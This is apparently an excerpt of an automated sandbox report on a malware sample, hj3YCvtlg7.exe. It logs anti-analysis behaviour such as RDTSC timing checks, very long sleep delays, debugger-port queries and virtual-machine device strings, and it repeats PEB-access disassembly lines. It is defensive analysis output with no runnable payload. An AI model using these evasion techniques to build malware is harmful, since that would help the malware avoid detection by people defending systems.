          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: hj3YCvtlg7.exe PID: 7652, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C73872 DnsGetCacheDataTableEx,DnsFree,DnsFree,7_2_00C73872
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 1D9B7E second address: 1D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 10C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 4C10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 7A50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 8A50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 8D00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMemory allocated: 9D00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4662Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5264Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 890Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9800Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13836
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.5 %
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exe TID: 7672Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5916Thread sleep count: 4662 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5916Thread sleep time: -9324000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5916Thread sleep count: 5264 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5916Thread sleep time: -10528000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028Thread sleep count: 170 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028Thread sleep time: -340000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028Thread sleep count: 9800 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 8028Thread sleep time: -19600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.3838977700.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
          Source: explorer.exe, 00000006.00000002.3839674348.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
          Source: explorer.exe, 00000006.00000002.3838977700.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
          Source: explorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
          Source: explorer.exe, 00000006.00000000.1359952336.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
          Source: explorer.exe, 00000006.00000002.3838977700.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
          Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
          Source: explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B8158 mov eax, dword ptr fs:[00000030h]5_2_017B8158
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]5_2_01726154
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]5_2_01726154
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171C156 mov eax, dword ptr fs:[00000030h]5_2_0171C156
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B4144 mov ecx, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01750124 mov eax, dword ptr fs:[00000030h]5_2_01750124
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CA118 mov ecx, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E0115 mov eax, dword ptr fs:[00000030h]5_2_017E0115
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017501F8 mov eax, dword ptr fs:[00000030h]5_2_017501F8
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017F61E5 mov eax, dword ptr fs:[00000030h]5_2_017F61E5
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]5_2_017E61C3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]5_2_017E61C3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01760185 mov eax, dword ptr fs:[00000030h]5_2_01760185
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]5_2_017DC188
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]5_2_017DC188
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]5_2_017C4180
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]5_2_017C4180
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174C073 mov eax, dword ptr fs:[00000030h]5_2_0174C073
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01722050 mov eax, dword ptr fs:[00000030h]5_2_01722050
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A6050 mov eax, dword ptr fs:[00000030h]5_2_017A6050
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B6030 mov eax, dword ptr fs:[00000030h]5_2_017B6030
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171A020 mov eax, dword ptr fs:[00000030h]5_2_0171A020
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171C020 mov eax, dword ptr fs:[00000030h]5_2_0171C020
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A4000 mov ecx, dword ptr fs:[00000030h]5_2_017A4000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171C0F0 mov eax, dword ptr fs:[00000030h]5_2_0171C0F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017620F0 mov ecx, dword ptr fs:[00000030h]5_2_017620F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0171A0E3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A60E0 mov eax, dword ptr fs:[00000030h]5_2_017A60E0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017280E9 mov eax, dword ptr fs:[00000030h]5_2_017280E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A20DE mov eax, dword ptr fs:[00000030h]5_2_017A20DE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E60B8 mov eax, dword ptr fs:[00000030h]5_2_017E60B8
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E60B8 mov ecx, dword ptr fs:[00000030h]5_2_017E60B8
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B80A8 mov eax, dword ptr fs:[00000030h]5_2_017B80A8
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172208A mov eax, dword ptr fs:[00000030h]5_2_0172208A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C437C mov eax, dword ptr fs:[00000030h]5_2_017C437C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A035C mov ecx, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EA352 mov eax, dword ptr fs:[00000030h]5_2_017EA352
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C8350 mov ecx, dword ptr fs:[00000030h]5_2_017C8350
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171C310 mov ecx, dword ptr fs:[00000030h]5_2_0171C310
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01740310 mov ecx, dword ptr fs:[00000030h]5_2_01740310
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]5_2_0175A30B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]5_2_0175A30B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]5_2_0175A30B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]5_2_0173E3F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]5_2_0173E3F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]5_2_0173E3F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017563FF mov eax, dword ptr fs:[00000030h]5_2_017563FF
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
